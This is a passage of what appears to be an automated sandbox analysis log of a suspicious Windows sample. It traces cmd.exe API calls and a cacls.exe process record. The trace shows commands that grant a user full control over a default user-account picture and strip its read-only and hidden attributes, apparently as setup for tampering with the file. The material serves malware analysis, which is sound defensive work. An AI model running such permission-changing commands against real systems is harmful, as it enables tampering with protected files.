_String2="TIME") returned -9 [0184.945] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0184.945] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0184.945] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1cf4a8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0184.945] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", 
nBufferLength=0x104, lpBuffer=0x1cf4a8, lpFilePart=0x1cf4a4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1cf4a4*="Desktop") returned 0x18 [0184.946] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0184.946] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1cf224 | out: lpFindFileData=0x1cf224) returned 0x2c0ae8 [0184.946] FindClose (in: hFindFile=0x2c0ae8 | out: hFindFile=0x2c0ae8) returned 1 [0184.946] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1cf224 | out: lpFindFileData=0x1cf224) returned 0x2c0ae8 [0184.946] FindClose (in: hFindFile=0x2c0ae8 | out: hFindFile=0x2c0ae8) returned 1 [0184.946] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1cf224 | out: lpFindFileData=0x1cf224) returned 0x2c0ae8 [0184.946] FindClose (in: hFindFile=0x2c0ae8 | out: hFindFile=0x2c0ae8) returned 1 [0184.946] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0184.946] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0184.946] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0184.947] GetEnvironmentStringsW () returned 0x2c0308* [0184.947] FreeEnvironmentStringsW (penv=0x2c0308) returned 1 [0184.947] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0184.947] GetConsoleOutputCP () returned 0x1b5 [0184.947] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0184.947] GetUserDefaultLCID () returned 0x409 [0184.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0184.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1cf5e8, cchData=128 | out: lpLCData="0") 
returned 2 [0184.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1cf5e8, cchData=128 | out: lpLCData="0") returned 2 [0184.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1cf5e8, cchData=128 | out: lpLCData="1") returned 2 [0184.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0184.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0184.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0184.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0184.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0184.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0184.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0184.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0184.948] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0184.948] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0184.948] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0184.949] GetConsoleTitleW (in: lpConsoleTitle=0x2b09b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0184.950] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0184.950] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0184.950] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0184.950] 
GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0184.951] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0184.951] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0184.951] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0184.951] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0184.951] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0184.951] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0184.951] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0184.951] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0184.955] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0184.955] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0184.955] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0184.955] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0184.955] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0184.955] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0184.955] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0184.960] GetConsoleTitleW (in: lpConsoleTitle=0x1cf27c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0184.960] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0184.960] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0184.960] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0184.960] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0184.960] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0184.960] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0184.960] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0184.960] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0184.960] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0184.961] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 
[0184.961] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0184.961] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0184.961] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0184.961] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0184.961] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0184.961] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0184.961] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0184.961] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0184.961] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0184.961] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0184.961] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0184.961] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0184.961] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0184.961] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0184.961] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0184.961] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0184.961] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0184.961] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0184.961] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0184.961] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0184.961] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0184.961] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0184.961] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0184.961] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0184.961] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0184.961] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0184.961] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0184.961] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0184.961] _wcsicmp (_String1="CACLS", _String2="FTYPE") 
returned -3 [0184.961] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0184.961] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0184.961] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0184.961] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0184.961] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0184.961] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0184.961] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0184.961] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0184.962] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0184.962] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0184.962] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0184.962] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0184.962] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0184.962] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0184.962] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0184.962] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0184.962] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0184.962] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0184.962] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0184.962] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0184.962] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0184.962] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0184.962] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0184.962] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0184.962] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0184.962] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0184.962] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0184.962] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0184.962] _wcsicmp (_String1="CACLS", _String2="VER") 
returned -19 [0184.962] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0184.962] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0184.962] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0184.962] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0184.962] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0184.962] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0184.962] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0184.962] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0184.962] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0184.962] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0184.962] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0184.962] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0184.962] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0184.962] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0184.962] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0184.962] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0184.963] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0184.963] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0184.963] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0184.963] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0184.963] SetErrorMode (uMode=0x0) returned 0x0 [0184.963] SetErrorMode (uMode=0x1) returned 0x0 [0184.963] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x2c1e98, lpFilePart=0x1ced9c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1ced9c*="Desktop") returned 0x18 [0184.963] SetErrorMode (uMode=0x0) returned 0x1 [0184.964] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 
[0184.964] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0184.970] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0184.971] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x1ceb18, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ceb18) returned 0xffffffff [0184.971] GetLastError () returned 0x2 [0184.971] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x1ceb18, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ceb18) returned 0xffffffff [0184.971] GetLastError () returned 0x2 [0184.971] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x1ceb18, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ceb18) returned 0x2c2180 [0184.972] FindClose (in: hFindFile=0x2c2180 | out: hFindFile=0x2c2180) returned 1 [0184.972] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x1ceb18, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ceb18) returned 0xffffffff [0184.972] GetLastError () returned 0x2 [0184.972] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x1ceb18, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ceb18) returned 0x2c2180 [0184.972] FindClose (in: hFindFile=0x2c2180 | out: hFindFile=0x2c2180) returned 1 [0184.972] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0184.972] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0184.972] GetConsoleTitleW (in: lpConsoleTitle=0x1cf010, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0184.972] 
InitializeProcThreadAttributeList (in: lpAttributeList=0x1cee98, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1cef60 | out: lpAttributeList=0x1cee98, lpSize=0x1cef60) returned 1 [0184.972] UpdateProcThreadAttribute (in: lpAttributeList=0x1cee98, dwFlags=0x0, Attribute=0x60001, lpValue=0x1cef58, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1cee98, lpPreviousValue=0x0) returned 1 [0184.972] GetStartupInfoW (in: lpStartupInfo=0x1cee54 | out: lpStartupInfo=0x1cee54*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0184.972] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0184.974] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1ceef4*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1cef40 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x1cef40*(hProcess=0x50, hThread=0x4c, dwProcessId=0x3dc, dwThreadId=0xe28)) returned 1 [0184.977] 
CloseHandle (hObject=0x4c) returned 1 [0184.977] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0184.977] GetEnvironmentStringsW () returned 0x2c0308* [0184.977] FreeEnvironmentStringsW (penv=0x2c0308) returned 1 [0184.977] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0185.040] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x1cee34 | out: lpExitCode=0x1cee34*=0x0) returned 1 [0185.040] CloseHandle (hObject=0x50) returned 1 [0185.040] _vsnwprintf (in: _Buffer=0x1cef7c, _BufferCount=0x13, _Format="%08X", _ArgList=0x1cee40 | out: _Buffer="00000000") returned 8 [0185.040] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0185.040] GetEnvironmentStringsW () returned 0x2c2410* [0185.041] FreeEnvironmentStringsW (penv=0x2c2410) returned 1 [0185.041] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0185.041] GetEnvironmentStringsW () returned 0x2c2410* [0185.041] FreeEnvironmentStringsW (penv=0x2c2410) returned 1 [0185.041] DeleteProcThreadAttributeList (in: lpAttributeList=0x1cee98 | out: lpAttributeList=0x1cee98) [0185.041] GetConsoleTitleW (in: lpConsoleTitle=0x1cf27c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0185.041] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0185.041] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0185.041] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0185.041] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x1ceb18, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ceb18) returned 0xffffffff [0185.042] 
GetLastError () returned 0x2 [0185.042] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x1ceb18, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ceb18) returned 0xffffffff [0185.042] GetLastError () returned 0x2 [0185.042] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x1ceb18, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ceb18) returned 0x2be4d8 [0185.042] FindClose (in: hFindFile=0x2be4d8 | out: hFindFile=0x2be4d8) returned 1 [0185.042] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x1ceb18, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ceb18) returned 0xffffffff [0185.042] GetLastError () returned 0x2 [0185.042] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x1ceb18, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ceb18) returned 0x2be4d8 [0185.042] FindClose (in: hFindFile=0x2be4d8 | out: hFindFile=0x2be4d8) returned 1 [0185.042] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0185.043] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0185.043] GetConsoleTitleW (in: lpConsoleTitle=0x1cf010, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0185.043] InitializeProcThreadAttributeList (in: lpAttributeList=0x1cee98, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1cef60 | out: lpAttributeList=0x1cee98, lpSize=0x1cef60) returned 1 [0185.043] UpdateProcThreadAttribute (in: lpAttributeList=0x1cee98, dwFlags=0x0, Attribute=0x60001, lpValue=0x1cef58, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1cee98, lpPreviousValue=0x0) returned 1 [0185.043] GetStartupInfoW (in: lpStartupInfo=0x1cee54 | out: lpStartupInfo=0x1cee54*(cb=0x44, 
lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0185.043] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0185.043] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1ceef4*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1cef40 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp\"", lpProcessInformation=0x1cef40*(hProcess=0x4c, hThread=0x50, dwProcessId=0xd3c, dwThreadId=0xd8c)) returned 1 [0185.045] CloseHandle (hObject=0x50) returned 1 [0185.045] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0185.045] GetEnvironmentStringsW () returned 0x2c2410* [0185.045] FreeEnvironmentStringsW (penv=0x2c2410) returned 1 [0185.046] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0185.097] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x1cee34 | out: lpExitCode=0x1cee34*=0x0) returned 1 [0185.097] CloseHandle (hObject=0x4c) returned 1 [0185.097] _vsnwprintf (in: _Buffer=0x1cef7c, 
_BufferCount=0x13, _Format="%08X", _ArgList=0x1cee40 | out: _Buffer="00000000") returned 8 [0185.097] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0185.097] GetEnvironmentStringsW () returned 0x2c2410* [0185.097] FreeEnvironmentStringsW (penv=0x2c2410) returned 1 [0185.097] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0185.097] GetEnvironmentStringsW () returned 0x2c2410* [0185.097] FreeEnvironmentStringsW (penv=0x2c2410) returned 1 [0185.097] DeleteProcThreadAttributeList (in: lpAttributeList=0x1cee98 | out: lpAttributeList=0x1cee98) [0185.097] _get_osfhandle (_FileHandle=1) returned 0x7 [0185.097] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0185.098] _get_osfhandle (_FileHandle=1) returned 0x7 [0185.098] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0185.098] _get_osfhandle (_FileHandle=0) returned 0x3 [0185.098] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0185.098] SetConsoleInputExeNameW () returned 0x1 [0185.098] GetConsoleOutputCP () returned 0x1b5 [0185.098] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0185.098] SetThreadUILanguage (LangId=0x0) returned 0x409 [0185.098] exit (_Code=0) Process: id = "368" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16c40" os_pid = "0x3dc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "367" os_parent_pid = "0xd48" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT 
AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26309 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26310 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 26311 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 26312 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 26313 start_va = 0xf90000 end_va = 0xf98fff entry_point = 0xf90000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 26314 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26315 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26316 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26317 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 26318 start_va = 0x7ffdf000 end_va = 0x7ffdffff 